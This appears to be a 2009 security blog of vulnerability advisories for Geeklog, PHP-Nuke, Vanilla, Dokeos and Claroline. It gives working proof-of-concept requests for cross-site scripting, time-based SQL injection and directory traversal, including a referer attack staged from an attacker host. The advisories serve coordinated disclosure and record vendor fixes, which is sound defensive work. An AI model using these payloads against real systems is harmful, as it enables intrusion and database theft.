Tuesday, July 28, 2009

Geeklog v.1.6.0 Cross-Site Scripting

Author: Gerendi Sandor Attila (http://gsasec.blogspot.com/)
Date: May 05, 2009
Package: Geeklog (1.6.0)
Product Homepage: http://www.geeklog.net/
Versions Affected: v.1.6.0 (Other versions may also be affected)
Severity: Medium

Input passed to the 'shortmsg' and 'message' POST parameter when posting to '/profiles.php' is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Example 1:
POST /profiles.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 151

what=sendstory&from=x&fromemail=x&to=x&toemail=x&shortmsg=1</textarea><script>alert(1234)</script><textarea>&sid=welcome
will result in:
<td><textarea name="shortmsg" rows="8" style="width:100%">1</textarea><script>alert(1234)</script><textarea></textarea></td>


Example 2:
POST /profiles.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded

what=contact&author=x&authoremail=x&subject=x&message=1</textarea><script>alert(123)</script>&uid=2
will result in:
<td><textarea name="message" wrap="physical" rows="10" cols="50">1</textarea><script>alert(123)</script></textarea></td>


Status:
1. Contacted the author at: July 28, 2009 via security email.
2. The author promptly fixed the problem, see at http://www.geeklog.net/article.php/geeklog-1.6.0sr1.

Wednesday, May 27, 2009

PHP Nuke v.8.0 (referer) SQL Injection

Author: Gerendi Sandor Attila
Date: May 14, 2009
Package: PHP-Nuke
Product homepage: http://phpnuke.org/
Versions Affected: v.8.0 (Other versions may also be affected)
Severity: High

The 'referer' header element when requesting the '/main/tracking/userLog.php' is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Description:

- Sample request:
GET http://somehost/PHP-Nuke-8.0/index.php HTTP/1.0
Accept: */*
referer: '+IF(False,'',SLEEP(5))+'
This will result in a query like:
INSERT INTO nuke_referer VALUES (NULL, ''+IF(False,'',SLEEP(5))+'')
and the HTTP response will arrive after 5 seconds, replacing the 'False' statement with conditional queries can be used to extract arbitrary data from the database. Also the injection can be used to insert arbitrary data into the 'nuke_referer' table.

Status:
1. Contacted the author at: May 14, 2009 via: http://phpnuke.org/modules.php?name=Feedback
2. No response received (May 27, 2009)
3. According to Evaders99 this vulnerability was already reported in 2007 (http://secunia.com/advisories/cve_reference/CVE-2007-1061/), thanks for the update. Still the downloadable v.8.0 was vulnerable.

Friday, May 15, 2009

Vanilla v.1.1.7 Cross-Site Scripting

Author: Gerendi Sandor Attila
Date: May 14, 2009
Package: Vanilla (1.1.7)
Product Homepage: http://getvanilla.com/
Versions Affected: v.1.1.7, 1.1.5 (Other versions may also be affected)
Severity: Medium

Input passed to the 'RequestName' header parameter when posting to '/ajax/updatecheck.php' is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Example:
http://somehost/ajax/updatecheck.php?PostBackKey=1&ExtensionKey=1&RequestName=1<script>alert(123)</script>
will return:
1<script>alert(123)</script>|[ERROR]There was a problem authenticating your post information.

Status:
1. Contacted the author at: May 15, 2009 via http://lussumo.com/
2. The author corrected the problem in the same day (read here).

Thursday, May 14, 2009

PHP Nuke v.8.0 Directory Traversal

Author: Gerendi Sandor Attila
Date: May 04, 2009
Package: PHP-Nuke
Product homepage: http://phpnuke.org/
Versions Affected: v.8.0 (Other versions may also be affected)
Severity: High

The cookie parameter "lang" in "/modules.php" is vulnerable to directory traversal attacks and possibly to arbitrary code inclusion/execution.

Description:
In the mainfile.php we have (lines 3316-333):

if (isset($newlang) AND !stripos_clone($newlang,".")) {
if (file_exists("language/lang-".$newlang.".php")) {
setcookie("lang",$newlang,time()+31536000);
include_once("language/lang-".$newlang.".php");
$currentlang = $newlang;
} else {
setcookie("lang",$language,time()+31536000);
include_once("language/lang-".$language.".php");
$currentlang = $language;
}
} elseif (isset($lang)) {
include_once("language/lang-".$lang.".php");
$currentlang = $lang;
} else {
setcookie("lang",$language,time()+31536000);
include_once("language/lang-".$language.".php");
$currentlang = $language;
}
now look at this statement: include_once("language/lang-".$lang.".php"); on Windows we can use as base for directory manipulation nonexistent file names. So assume we have c:\somefile.php and our web server is also installed somewhere on c:\, inserting something like:
/../../../../../../../../../somefile.php
will result in:
include_once('language/lang-/../../../../../../../../../somefile.php');
and the file will be included correctly.

Status:
1. Contacted the author at: May 04, 2009 via: http://phpnuke.org/modules.php?name=Feedback
2. No response where given (May 14 2009).
3. According to Evaders99 this vulnerability was already reported in 2007 (http://secunia.com/advisories/24484/), thanks for the update. Still the downloadable v.8.0 was vulnerable.

Wednesday, May 13, 2009

Dokeos Free v.1.8.5 Multiple Vulnerabilities

Author: Gerendi Sandor Attila
Date: April 24, 2009
Package: Dokeos Free 1.8.5 Valparais
Product homepage: http://www.dokeos.com/
Versions Affected: v.1.8.5 (Other versions may also be affected)
Severity: High

SQL Injection:

1. The 'uInfo' parameter from /main/tracking/userLog.php is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Requires magic_quotes_gpc=OFF, but as you can see here: http://www.php.net/magic_quotes, relying on magic_quotes_gpc=ON feature is highly discouraged .

Proof of concept custom request (SLEEP only works with mySQL > 5.0, but there are many another examples):
http://somehost/main/tracking/userLog.php?uInfo=1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,SLEEP(30)%23
this request will 'hang' for 30 seconds.

The resulting query will be:
SELECT * FROM `wa_dokeos_1_8_5_dokeos_main`.`user` WHERE `user_id` = '1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,SLEEP(30)#'
executed from get_user_info_from_id.

2. The 'course' parameter from /main/mySpace/lp_tracking.php is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Exploitation of this is similar with the vulnerability at point 1.
We can also build more complicated injections which will allow us to extract arbitrary data from the database using the true/false condition based sequential extraction mechanism.

XSS (Cross-Site Scripting):

1. The 'curdirpath' parameter from /main/document/slideshow.php is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
http://somehost/main/document/slideshow.php?curdirpath=1<script>alert(123)</script>
2. The 'file' parameter from /main/exercice/testheaderpage.php is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
http://somehost/main/exercice/testheaderpage.php?file=1<script>alert(123)</script>
Possible directory traversal ineffective sanitation :

In the 'hotspot_lang_conversion.php' file we have for sanitation the $_GET['lang']:

$search = array('../','\\0');
$lang = str_replace($search,'',urldecode($_GET['lang']));

The sanitation is weak here, on windows /../../../ working as well as ..\..\..\..\..\ and the str_replace does not behave well in this situation to remove the NULL character injected from the url request. On windows a query like this will pass the sanitation:

http://somehost/main/exercice/hotspot_lang_conversion.php?lang=..\..\..\..\..\..\..\todo.txt
Directory traversal:

1.Input passed to the "doc_url" parameter in "/main/exercice/Hpdownload.php" isn't properly verified, before it is used to include files. This can be exploited to read arbitrary files from local resources.
http://somehost/main/exercice/Hpdownload.php?doc_url=..\..\..\..\..\..\..\todo.txt
STATUS:
1. Contacted the author at Aprl 29, 2009 via email.
2. The author released a patch (read here).

Tuesday, May 12, 2009

Claroline v.1.8.11 SQL Injection

Author: Gerendi Sandor Attila (http://gsasec.blogspot.com/)
Date: May 05, 2009
Package: Claroline (1.8.11)
Product Homepage: http://www.claroline.net/
Versions Affected: v.1.8.11 (Other versions may also be affected)
Severity: High

The 'sort' parameter from '/claroline/group/group.php' is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Example, the request:
http://somehost/claroline/group/group.php?cidReq=TEST1&sort=IF(FALSE,1,SLEEP(10))&dir=3
will generate the flowing SQL query:
      SELECT * FROM `c_TEST1_group_team` `g`

# retrieve the tutor id
LEFT JOIN `claroline_1_8_11`.`cl_user` AS `tutor`
ON `tutor`.`user_id` = `g`.`tutor`

# retrieve the user group(s)
LEFT JOIN `c_TEST1_group_rel_team_user` AS `ug`
ON `ug`.`team` = `g`.`id` AND `ug`.`user` = 0

# count the registered users in each group
LEFT JOIN `c_TEST1_group_rel_team_user` `ug2`
ON `ug2`.`team` = `g`.`id`

GROUP BY `g`.`id`
ORDER BY IF(FALSE,1,SLEEP(10)) DESC LIMIT 0, 20
This query will lag about 10 seconds. Replacing the FALSE element (from IF(FALSE,1,SLEEP(10))) with conditional queries may be used to extract arbitrary data from the database.

Status:
1. Contacted the author at: May 07, 2009 via http://forum.claroline.net/.
2. The author fixed the problem, read at: Re: Claroline v.1.8.11 SQL Injection

Tuesday, May 5, 2009

Claroline v.1.8.11 Cross-Site Scripting

Author: Gerendi Sandor Attila (http://gsasec.blogspot.com/)
Date: May 05, 2009
Package: Claroline (1.8.11)
Product Homepage: http://www.claroline.net/
Versions Affected: v.1.8.11 (Other versions may also be affected)
Severity: Medium

Input passed to the 'Referer' header parameter when posting to '/claroline/linker/notfound.php' is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Example:
GET /claroline_1_8_11/claroline/linker/notfound.php HTTP/1.0
Accept: */*
Referer: "><script>alert(123)</script><a href="

There are a couple of ways to inject arbitrary text (java script in our case) in the referer header parameter. One of the ways is using a rewrite rule on the remote attacker server. Example .htaccess file:
RewriteEngine  on
RewriteRule ^referer/.*$ test.php [L]
Where the test.php file will be the container of the /claroline_1_8_11/claroline/linker/notfound.php link.

Now a request like: http://remoteatackersite/referer/?"><script>alert(123)</script><a%20href="

will return a page from wich if we call /claroline_1_8_11/claroline/linker/notfound.php we trigger the XSS.

Note: For the first request browsers like IE are required (which does not automatically httpencode the get params)

Status:
1. Contacted the author at: May 05, 2009 via http://forum.claroline.net/.
2. The author promptly (same day) fixed the problem, read at: Re: Claroline 1.8.11 Cross-Site Scripting